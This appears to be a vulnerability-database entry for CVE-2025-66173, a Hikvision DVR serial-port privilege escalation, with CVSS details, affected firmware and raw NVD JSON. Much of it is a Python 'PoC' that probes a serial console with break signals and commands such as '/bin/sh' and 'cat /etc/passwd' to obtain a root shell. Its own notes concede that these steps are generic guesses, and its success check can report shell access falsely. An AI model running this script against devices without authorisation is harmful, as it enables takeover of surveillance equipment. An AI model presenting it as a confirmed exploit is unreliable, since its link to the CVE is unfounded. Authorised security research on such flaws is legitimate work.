Security Vulnerability Report
CVE-2025-66173 CVSS 6.2 MEDIUM

CVE-2025-66173

Published: 2025-12-19 07:16:02
Last Modified: 2025-12-23 21:45:17

Description

There is a privilege escalation vulnerability in some Hikvision DVR products. Due to the improper implementation of authentication for the serial port, an attacker with physical access could exploit this vulnerability by connecting to the affected products and gaining access to an unrestricted shell environment.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

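cpe:2.3:o:hikvision:ds-7104hghi-f1_firmware:*:*:*:*:*:*:*:* (versions up to and including 4.30.122_201107) - VULNERABLE
cpe:2.3:h:hikvision:ds-7104hghi-f1:-:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform the firmware above runs on)
cpe:2.3:o:hikvision:ds-7204hghi-f1_firmware:*:*:*:*:*:*:*:* (versions up to and including 4.30.122_201107) - VULNERABLE
cpe:2.3:h:hikvision:ds-7204hghi-f1:-:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform the firmware above runs on)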
Hikvision DVR (specific models and versions need to be verified from vendor advisory)
Hikvision NVR devices (affected models listed in official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
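#!/usr/bin/env python3
"""
CVE-2025-66173 PoC - Hikvision DVR Serial Port Privilege Escalation

Note: This PoC is for educational and authorized testing purposes only.

Reviewer notes:
- The CVE description only states that authentication for the serial port is
  improperly implemented; it does not describe a trigger. The steps in this
  script are generic serial-console probes (newlines, a break signal and a
  short command list), so a negative result is not evidence that a device is
  patched. Compare the installed firmware version with the vendor advisory.
- The result check is a loose byte match on the console output; treat a
  positive result as a prompt for manual confirmation, not as proof.
"""

import serial
import time
import sys


def exploit_serial_privilege_escalation(port='/dev/ttyUSB0', baudrate=115200):
    """
    Probe a serial console for a shell that answers without authentication.

    The port is opened 8N1 with a one-second read timeout and is closed on
    every exit path, including the early "shell found" return and errors.

    :param port: Serial port device path
    :param baudrate: Baud rate for serial communication (typically 115200)
    :return: True if any response contained ``#``, ``$`` or ``root``;
             False otherwise, including when the port could not be used
    """
    try:
        # The context manager releases the device node even on early return
        # or exception, so a failed run does not leave the adapter locked.
        with serial.Serial(
            port=port,
            baudrate=baudrate,
            bytesize=serial.EIGHTBITS,
            parity=serial.PARITY_NONE,
            stopbits=serial.STOPBITS_ONE,
            timeout=1
        ) as ser:
            print(f"[*] Connected to {port} at {baudrate} baud")

            # Wait for device boot
            time.sleep(3)

            # Clear serial buffers (pyserial 3.x names; flushInput/flushOutput
            # are the deprecated spellings of the same calls)
            ser.reset_input_buffer()
            ser.reset_output_buffer()

            # Method 1: Try to break into uboot/shell during boot
            print("[*] Attempting to break into shell during boot...")
            for _ in range(10):
                ser.write(b'\r\n')
                time.sleep(0.3)

            # Method 2: Send break sequence to trigger shell
            print("[*] Sending break sequence...")
            ser.send_break(duration=0.5)
            time.sleep(1)

            # Method 3: Try common debug commands to bypass authentication
            debug_commands = [
                b'shell\r\n',
                b'/bin/sh\r\n',
                b'exec /bin/sh\r\n',
                b'id\r\n',
                b'cat /etc/passwd\r\n',
                b'uname -a\r\n'
            ]

            for cmd in debug_commands:
                print(f"[*] Trying command: {cmd.decode().strip()}")
                ser.write(cmd)
                time.sleep(0.5)

                # Read response
                response = ser.read(ser.in_waiting)
                if response:
                    print(f"[RESPONSE]\n{response.decode('utf-8', errors='ignore')}")

                    # Check if we got shell access.
                    # NOTE(review): this matches any output containing these
                    # bytes, not only a shell prompt, so it can report a
                    # false positive on unrelated console text.
                    if b'#' in response or b'$' in response or b'root' in response:
                        print("[+] Shell access obtained!")
                        return True

            # Read any remaining data
            response = ser.read(ser.in_waiting)
            if response:
                print(f"[FINAL RESPONSE]\n{response.decode('utf-8', errors='ignore')}")

            return False

    except serial.SerialException as e:
        print(f"[-] Serial connection error: {e}")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == '__main__':
    print("="*60)
    print("CVE-2025-66173 - Hikvision DVR Serial Privilege Escalation")
    print("="*60)

    # Optional positional arguments: serial device path, then baud rate.
    port = sys.argv[1] if len(sys.argv) > 1 else '/dev/ttyUSB0'
    baudrate = int(sys.argv[2]) if len(sys.argv) > 2 else 115200

    print(f"[*] Target: {port}")
    print(f"[*] Baudrate: {baudrate}")
    print("[*] Starting exploitation...\n")

    result = exploit_serial_privilege_escalation(port, baudrate)

    if result:
        print("\n[!] VULNERABLE - Shell access achieved")
    else:
        print("\n[*] Exploitation completed - check output above")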

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66173", "sourceIdentifier": "[email protected]", "published": "2025-12-19T07:16:01.643", "lastModified": "2025-12-23T21:45:17.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a privilege escalation vulnerability in some Hikvision DVR products. Due to the improper implementation of authentication for the serial port, an attacker with physical access could exploit this vulnerability by connecting to the affected products and gaining access to an unrestricted shell environment."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-7104hghi-f1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.30.122_201107", "matchCriteriaId": "E24B2885-8FBF-4738-8C7A-1C8DB3823EE5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-7104hghi-f1:-:*:*:*:*:*:*:*", "matchCriteriaId": "8104E12A-CD97-4F8F-9A76-8CD308B9F98A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-7204hghi-f1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.30.122_201107", "matchCriteriaId": "6DA771B5-1C67-4A32-90B2-A7E0E9C194F7"}]}, {"operator": "OR", 
"negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-7204hghi-f1:-:*:*:*:*:*:*:*", "matchCriteriaId": "6DF801EB-DDBF-44C6-84BB-9D903FEBEAC8"}]}]}], "references": [{"url": "https://www.hikvision.com/en/support/cybersecurity/security-advisory/serial-port-privilege-escalation-vulnerabilities-in-some-hikvision-nvr-devices/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}